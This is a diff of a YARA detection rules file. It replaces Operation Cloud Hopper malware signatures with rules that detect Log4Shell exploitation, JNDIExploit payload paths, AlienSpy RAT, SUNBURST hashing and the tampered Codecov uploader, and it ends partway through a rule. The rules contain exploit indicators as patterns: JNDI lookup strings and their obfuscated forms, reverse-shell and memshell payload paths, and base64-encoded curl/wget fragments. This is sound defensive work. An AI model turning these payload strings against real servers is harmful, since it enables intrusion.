-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "27876dc5e6f746ff6003450eeea5e98de5d96cbcba9e4694dad94ca3e9fb1ddc"
+		tags = ""
 
 	strings:
-		$s1 = "zok]\\\\\\ZZYYY666564444" fullword ascii
-		$s2 = "z{[ZZYUKKKIIGGGGGGGGGGGGG" fullword ascii
-		$s3 = "EEECEEC" fullword ascii
-		$s4 = "IIEFEE" fullword ascii
+		$x01 = "/Basic/Command/Base64/"
+		$x02 = "/Basic/ReverseShell/"
+		$x03 = "/Basic/TomcatMemshell"
+		$x04 = "/Basic/JettyMemshell"
+		$x05 = "/Basic/WeblogicMemshell"
+		$x06 = "/Basic/JBossMemshell"
+		$x07 = "/Basic/WebsphereMemshell"
+		$x08 = "/Basic/SpringMemshell"
+		$x09 = "/Deserialization/URLDNS/"
+		$x10 = "/Deserialization/CommonsCollections1/Dnslog/"
+		$x11 = "/Deserialization/CommonsCollections2/Command/Base64/"
+		$x12 = "/Deserialization/CommonsBeanutils1/ReverseShell/"
+		$x13 = "/Deserialization/Jre8u20/TomcatMemshell"
+		$x14 = "/TomcatBypass/Dnslog/"
+		$x15 = "/TomcatBypass/Command/"
+		$x16 = "/TomcatBypass/ReverseShell/"
+		$x17 = "/TomcatBypass/TomcatMemshell"
+		$x18 = "/TomcatBypass/SpringMemshell"
+		$x19 = "/GroovyBypass/Command/"
+		$x20 = "/WebsphereBypass/Upload/"
+		$fp1 = "<html"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_2 : FILE
+rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_JAVA_Exception_Dec21_1 : CVE_2021_44228
 {
 	meta:
-		description = "Detects Operation CloudHopper malware samples"
+		description = "Detects exceptions found in server logs that indicate an exploitation attempt of CVE-2021-44228"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7c0a3d68-5f6b-5491-b0c2-94e8cff478d1"
-		date = "2017-04-03"
-		modified = "2023-01-06"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L28-L57"
+		id = "82cf337e-4ea1-559b-a7b8-512a07adf06f"
+		date = "2021-12-12"
+		modified = "2025-03-29"
+		reference = "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L51-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dff8623c35c83c20fb525209ec9aa5d77b51fa494eb557845a8320c77746c02f"
-		score = 90
+		logic_hash = "98eabec4ad2f5c4d22db9c3bebdc82c8dc6723599748360875fc7b613b1019ab"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "c1dbf481b2c3ba596b3542c7dc4e368f322d5c9950a78197a4ddbbaacbd07064"
+		tags = "CVE-2021-44228"
 
 	strings:
-		$x1 = "sERvEr.Dll" fullword ascii
-		$x2 = "ToolbarF.dll" fullword wide
-		$x3 = ".?AVCKeyLoggerManager@@" fullword ascii
-		$x4 = "GH0STCZH" ascii
-		$s1 = "%%SystemRoot%%\\System32\\svchost.exe -k \"%s\"" fullword wide
-		$s2 = "rundll32.exe \"%s\", UnInstall /update %s" fullword wide
-		$s3 = "\\Release\\Loader.pdb" ascii
-		$s4 = "%s\\%x.dll" fullword wide
-		$s5 = "Mozilla/4.0 (compatible)" fullword wide
-		$s6 = "\\syslog.dat" wide
-		$s7 = "NSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
-		$op1 = { 8d 34 17 8d 49 00 8a 14 0e 3a 14 29 75 05 41 3b }
-		$op2 = { 83 e8 14 78 cf c1 e0 06 8b f8 8b c3 8a 08 84 c9 }
-		$op3 = { 3b fb 7d 3f 8a 4d 14 8d 45 14 84 c9 74 1b 8a 14 }
+		$xa1 = "header with value of BadAttributeValueException: "
+		$sa1 = ".log4j.core.net.JndiManager.lookup(JndiManager"
+		$sa2 = "Error looking up JNDI resource"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) or all of ( $op* ) ) or ( 6 of them )
+		$xa1 or all of ( $sa* )
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_3 : FILE
+rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_Soft : FILE CVE_2021_44228
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ad1d3b48-d48c-5011-ac51-c8047e1ee8ed"
-		date = "2017-04-03"
-		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L59-L79"
+		id = "87e536a5-cc11-528a-b100-4fa3b2b7bc0c"
+		date = "2021-12-10"
+		modified = "2025-03-24"
+		reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L68-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d15b4c277e2c4dfe300f242e4cc9b217981166191a47939ca437c55391874b5d"
-		score = 75
+		logic_hash = "61a005060e2041afa5a9aa0b2a5e26cfc9a53cbafa78b15e4dd2c3b38127373a"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c21eaadf9ffc62ca4673e27e06c16447f103c0cf7acd8db6ac5c8bd17805e39d"
+		tags = "FILE, CVE-2021-44228"
 
 	strings:
-		$s6 = "operator \"\" " fullword ascii
-		$s7 = "zok]\\\\\\ZZYYY666564444" fullword ascii
-		$s11 = "InvokeMainViaCRT" fullword ascii
-		$s12 = ".?AVAES@@" fullword ascii
-		$op1 = { b6 4c 06 f5 32 cf 88 4c 06 05 0f b6 4c 06 f9 32 }
-		$op2 = { 06 fc eb 03 8a 5e f0 85 c0 74 05 8a 0c 06 eb 03 }
-		$op3 = { 7e f8 85 c0 74 06 8a 74 06 08 eb 03 8a 76 fc 85 }
+		$x01 = "${jndi:ldap:/"
+		$x02 = "${jndi:rmi:/"
+		$x03 = "${jndi:ldaps:/"
+		$x04 = "${jndi:dns:/"
+		$x05 = "${jndi:iiop:/"
+		$x06 = "${jndi:http:/"
+		$x07 = "${jndi:nis:/"
+		$x08 = "${jndi:nds:/"
+		$x09 = "${jndi:corba:/"
+		$fp1 = "<html"
+		$fp2 = "/nessus}"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( all of ( $s* ) and 1 of ( $op* ) ) or all of ( $op* ) ) or ( 5 of them )
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Opcloudhopper_Dropper_1 : FILE
+rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_OBFUSC : CVE_2021_44228
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Detects obfuscated indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b43ffb7e-1643-5560-8719-9c63582920e7"
-		date = "2017-04-03"
-		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L81-L94"
+		id = "d7c4092a-6ffc-5a89-b73a-f7f0ac984cbd"
+		date = "2021-12-12"
+		modified = "2021-12-13"
+		reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L94-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ee0caf8a08db9a2a83f10178e2ee890b6b0bc6e699ebb3d01fa94fa48c6dfdee"
-		score = 75
+		logic_hash = "00231db2ae83a89c187dbde1f2bc67fdaedcf1cbdf872afdcc374d2d0abee515"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "411571368804578826b8f24f323617f51b068809b1c769291b21125860dc3f4e"
+		tags = "CVE-2021-44228"
 
 	strings:
-		$s1 = "{\\version2}{\\edmins0}{\\nofpages1}{\\nofwords11}{\\nofchars69}{\\*\\company google}{\\nofcharsws79}{\\vern24611}{\\*\\password" ascii
+		$x1 = "$%7Bjndi:"
+		$x2 = "%2524%257Bjndi"
+		$x3 = "%2F%252524%25257Bjndi%3A"
+		$x4 = "${jndi:${lower:"
+		$x5 = "${::-j}${"
+		$x6 = "${${env:BARFOO:-j}"
+		$x7 = "${::-l}${::-d}${::-a}${::-p}"
+		$x8 = "${base64:JHtqbmRp"
+		$fp1 = "<html"
 
 	condition:
-		( uint16( 0 ) == 0x5c7b and filesize < 700KB and all of them )
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_4 : FILE
+rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_Hard : FILE CVE_2021_44228
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ebc810e6-f549-5401-9ee9-331888eda127"
-		date = "2017-04-03"
-		modified = "2023-01-06"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L96-L112"
+		description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
+		author = "Florian Roth"
+		id = "5297c42d-7138-507d-a3eb-153afe522816"
+		date = "2021-12-10"
+		modified = "2025-03-20"
+		reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L118-L140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7b39531e4af93ab026381a1114efe00fa01fb45860ddb512dbfa436471644e20"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ae6b45a92384f6e43672e617c53a44225e2944d66c1ffb074694526386074145"
+		logic_hash = "9a4fc285dd1680ebc8a1042eeb5fbba73b9e2df70678adf3163122d84405325e"
+		score = 65
+		quality = 60
+		tags = "FILE, CVE-2021-44228"
 
 	strings:
-		$s6 = "operator \"\" " fullword ascii
-		$s9 = "InvokeMainViaCRT" fullword ascii
-		$s10 = ".?AVAES@@" ascii
+		$x1 = /\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
+		$x2 = "Reference Class Name: foo"
+		$fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
+		$fpg2 = "<html"
+		$fpg3 = "<HTML"
+		$fp1 = "/QUALYSTEST" ascii
+		$fp2 = "w.nessus.org/nessus"
+		$fp3 = "/nessus}"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them )
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_5 : FILE
+rule SIGNATURE_BASE_SUSP_Base64_Encoded_Exploit_Indicators_Dec21 : CVE_2021_44228
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1ad189f8-a4c2-5f56-beec-a55bd516ad8d"
-		date = "2017-04-03"
-		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L114-L134"
+		id = "09abc4f0-ace7-5f53-b1d3-5f5c6bf3bdba"
+		date = "2021-12-10"
+		modified = "2021-12-13"
+		reference = "https://twitter.com/Reelix/status/1469327487243071493"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L142-L165"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9b91ac8f450843c7c85e8d056218aff671bb0f345d16a7ba3f4180ac008bf318"
-		score = 75
+		logic_hash = "703a83916c7279bcdc3cd61602472c2a3815140235be169f5b2063a547438c61"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "beb1bc03bb0fba7b0624f8b2330226f8a7da6344afd68c5bc526f9d43838ef01"
+		tags = "CVE-2021-44228"
 
 	strings:
-		$x1 = "CWINDOWSSYSTEMROOT" fullword ascii
-		$x2 = "YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK" fullword ascii
-		$x3 = "NJK_JK_SED_PNJHGFUUGIOO_PIY" fullword ascii
-		$x4 = "c_VDGQBUl}YSB_C_VDlqSDYFU" fullword ascii
-		$s7 = "FALLINLOVE" fullword ascii
-		$op1 = { 83 ec 60 8d 4c 24 00 e8 6f ff ff ff 8d 4c 24 00 }
+		$sa1 = "Y3VybCAtcy"
+		$sa2 = "N1cmwgLXMg"
+		$sa3 = "jdXJsIC1zI"
+		$sb1 = "fHdnZXQgLXEgLU8tI"
+		$sb2 = "x3Z2V0IC1xIC1PLS"
+		$sb3 = "8d2dldCAtcSAtTy0g"
+		$fp1 = "<html"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 4 of them )
+		1 of ( $sa* ) and 1 of ( $sb* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_6 : FILE
+rule SIGNATURE_BASE_SUSP_Jdniexploit_Indicators_Dec21 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Detects indicators of JDNI usage in log files and other payloads"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b7578cbd-0f41-5dec-86f6-5792c305a182"
-		date = "2017-04-03"
-		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L136-L152"
+		id = "2df8b8f3-8d8d-5982-8c85-692b7d91ebb2"
+		date = "2021-12-10"
+		modified = "2021-12-12"
+		reference = "https://github.com/flypig5211/JNDIExploit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L167-L180"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f165912001c5e2eb48cef46df12220f7f7a53e908a6af571bb4932c50e355388"
-		score = 75
-		quality = 85
+		logic_hash = "7886a67672001f0db72575d96d3a12341bfcdc49a9951e3d5e2a88ab46bf5a5d"
+		score = 70
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6"
 
 	strings:
-		$s1 = "YDNCCOVZKXGRVQPOBRNXXQVNQYXBBCONCOQEGYELIRBEYOVODGXCOXTHXPCXNGUCHRVWKKZSYQMAOWWGHRSPRGSEUWYMEFZHRTHO" fullword ascii
-		$s2 = "psychiatry.dat" fullword ascii
-		$s3 = "meekness.lnk" fullword ascii
-		$s4 = "SOFTWARE\\EGGORG" fullword ascii
+		$xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		filesize < 100MB and $xr1
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_7 : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_OBFUSC_Dec21_1 : CVE_2021_44228 FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d32e379-c902-5330-84f5-693a7649a2e4"
-		date = "2017-04-03"
-		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L154-L168"
+		id = "b8f56711-7922-54b9-9ce2-6ba05d64c80d"
+		date = "2021-12-11"
+		modified = "2022-11-08"
+		reference = "https://twitter.com/testanull/status/1469549425521348609"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L182-L211"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "01993e785fb7d5de9ea629d31725e86fa169b70dcde9716a5da0b646ac88864a"
-		score = 75
+		logic_hash = "d6ffb70da82fe16e7a76feb31c01aa3e0cfc5625cc0e2b237ec851c646550839"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "44a7bea8a08f4c2feb74c6a00ff1114ba251f3dc6922ea5ffab9e749c98cbdce"
+		tags = "CVE-2021-44228, FILE"
 
 	strings:
-		$x1 = "jepsjepsjepsjepsjepsjepsjepsjepsjepsjeps" fullword ascii
-		$x2 = "extOextOextOextO" fullword ascii
+		$f1 = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
+		$f2 = { 24 7B 75 70 70 65 72 3A ?? 7D }
+		$x3 = "$%7blower:"
+		$x4 = "$%7bupper:"
+		$x5 = "%24%7bjndi:"
+		$x6 = "$%7Blower:"
+		$x7 = "$%7Bupper:"
+		$x8 = "%24%7Bjndi:"
+		$fp1 = "<html"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		(1 of ( $x* ) or filesize < 200KB and 1 of ( $f* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_8 : FILE
+rule SIGNATURE_BASE_SUSP_Jdniexploit_Error_Indicators_Dec21_1
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Detects error messages related to JDNI usage in log files that can indicate a Log4Shell / Log4j exploitation"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5e0a09e3-732a-5a90-9d4a-11eae2aa4cc4"
-		date = "2017-04-03"
-		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L170-L189"
+		id = "68bcf043-58b4-54a9-b024-64871b5d535f"
+		date = "2021-12-10"
+		modified = "2023-06-23"
+		reference = "https://twitter.com/marcioalm/status/1470361495405875200?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_log4j_cve_2021_44228.yar#L213-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a27b041a1ff0fae3d06d8050fe3207435cb84f421099dc1cad8f8a503e976860"
-		score = 75
+		logic_hash = "2ab98814b2ed66b0bda875fecc0b09db82035d7edcdb0af65f815817ec8c6cc8"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "19aa5019f3c00211182b2a80dd9675721dac7cfb31d174436d3b8ec9f97d898b"
-		hash2 = "5cebc133ae3b6afee27beb7d3cdb5f3d675c3f12b7204531f453e99acdaa87b1"
+		tags = ""
 
 	strings:
-		$s1 = "WSHELL32.dll" fullword wide
-		$s2 = "operator \"\" " fullword ascii
-		$s3 = "\" /t REG_SZ /d \"" fullword wide
-		$s4 = " /f /v \"" fullword wide
-		$s5 = "zok]\\\\\\ZZYYY666564444" fullword ascii
-		$s6 = "AFX_DIALOG_LAYOUT" fullword wide
+		$x1 = "FATAL log4j - Message: BadAttributeValueException: "
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and 4 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_9 : FILE
+rule SIGNATURE_BASE_Crime_Win_Rat_Alienspy : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5a02f2ac-905d-550a-bde0-cfde6ed1a4ab"
-		date = "2017-04-03"
+		description = "Alien Spy Remote Access Trojan"
+		author = "General Dynamics Fidelis Cybersecurity Solutions - Threat Research Team"
+		id = "a79789cd-9b16-58f5-ab51-48bb900583d1"
+		date = "2015-04-04"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L191-L205"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_alienspy_rat.yar#L2-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f45159a508ce8ccb5ab57c7347916642f58ab1b6e0a8886ba53e4810ed65c5c1"
+		logic_hash = "2b6fec104a89badb057619f648119dcf6debd294ee2b80a1fde6ffa30a7a45f7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f0002b912135bcee83f901715002514fdc89b5b8ed7585e07e482331e4a56c06"
+		reference_1 = "www.fidelissecurity.com/sites/default/files/FTA_1015_Alienspy_FINAL.pdf"
+		reference_2 = "www.fidelissecurity.com/sites/default/files/AlienSpy-Configs2_1_2.csv"
+		filetype = "Java"
+		hash_1 = "075fa0567d3415fbab3514b8aa64cfcb"
+		hash_2 = "818afea3040a887f191ee9d0579ac6ed"
+		hash_3 = "973de705f2f01e82c00db92eaa27912c"
+		hash_4 = "7f838907f9cc8305544bd0ad4cfd278e"
+		hash_5 = "071e12454731161d47a12a8c4b3adfea"
+		hash_6 = "a7d50760d49faff3656903c1130fd20b"
+		hash_7 = "f399afb901fcdf436a1b2a135da3ee39"
+		hash_8 = "3698a3630f80a632c0c7c12e929184fb"
+		hash_9 = "fdb674cadfa038ff9d931e376f89f1b6"
 
 	strings:
-		$s1 = "MsMpEng.exe" fullword ascii
-		$op0 = { 2b c7 50 e8 22 83 ff ff ff b6 c0 }
+		$sa_1 = "META-INF/MANIFEST.MF"
+		$sa_2 = "Main.classPK"
+		$sa_3 = "plugins/Server.classPK"
+		$sa_4 = "IDPK"
+		$sb_1 = "config.iniPK"
+		$sb_2 = "password.iniPK"
+		$sb_3 = "plugins/Server.classPK"
+		$sb_4 = "LoadStub.classPK"
+		$sb_5 = "LoadStubDecrypted.classPK"
+		$sb_7 = "LoadPassword.classPK"
+		$sb_8 = "DecryptStub.classPK"
+		$sb_9 = "ClassLoaders.classPK"
+		$sc_1 = "config.xml"
+		$sc_2 = "options"
+		$sc_3 = "plugins"
+		$sc_5 = "util/OSHelper"
+		$sc_6 = "Start.class"
+		$sc_7 = "AlienSpy"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x4B50 and filesize < 800KB and ( ( all of ( $sa_* ) ) or ( all of ( $sb_* ) ) or ( all of ( $sc_* ) ) )
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_10 : FILE
+rule SIGNATURE_BASE_APT_Fnv1A_Plus_Extra_XOR_In_MSIL_Experimental : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a5d3237e-d6db-54ba-bfa6-f642f8096819"
-		date = "2017-04-03"
+		description = "This rule detects the specific MSIL implementation of fnv1a of the SUNBURST backdoor (standard fnv1a + one final XOR before RET) independent of the XOR-string. (fnv64a_offset and fnv64a_prime are standard constants in the fnv1a hashing algorithm.)"
+		author = "Arnim Rupp"
+		id = "5505f7ff-eca5-5274-bdd1-dbbd648c3ccc"
+		date = "2020-12-22"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L207-L222"
+		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_backdoor_sunburst_fnv1a_experimental.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "538754e6daadd3efa3e77723dce7143fecad28cf94caa1b29a2d45df44b14ee4"
-		score = 75
+		logic_hash = "6db212b21fec8d2c1b4cff9e32bdc027835ed660e7552b49f4418e7d0b35ca11"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5b4028728d8011a2003b7ce6b9ec663dd6a60b7adcc20e2125da318e2d9e13f4"
+		hash1 = "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77"
+		hash2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6"
+		hash3 = "019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134"
 
 	strings:
-		$x1 = "bakshell.EXE" fullword wide
-		$s19 = "bakshell Applicazione MFC" fullword wide
-		$op0 = { 83 c4 34 c3 57 8b ce e8 92 18 00 00 68 20 70 40 }
+		$fnv64a_offset = { 25 23 22 84 e4 9c f2 cb }
+		$fnv64a_prime_plus_gap_plus_xor_ret = { B3 01 00 00 00 01 [8-40] 61 2A 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Opcloudhopper_Malware_11 : FILE
+rule SIGNATURE_BASE_APT_SH_Codecov_Hack_Apr21_1 : FILE
 {
 	meta:
-		description = "Detects malware from Operation Cloud Hopper"
+		description = "Detects manipulated Codecov bash uploader tool that has been manipulated by an unknown actor during March / April 2021"
 		author = "Florian Roth (Nextron Systems)"
-		id = "18bd2fa9-7eca-5dbc-8e79-953800d5bb0a"
-		date = "2017-04-03"
+		id = "b5fb74c4-073e-53af-a207-1672e63c9a64"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
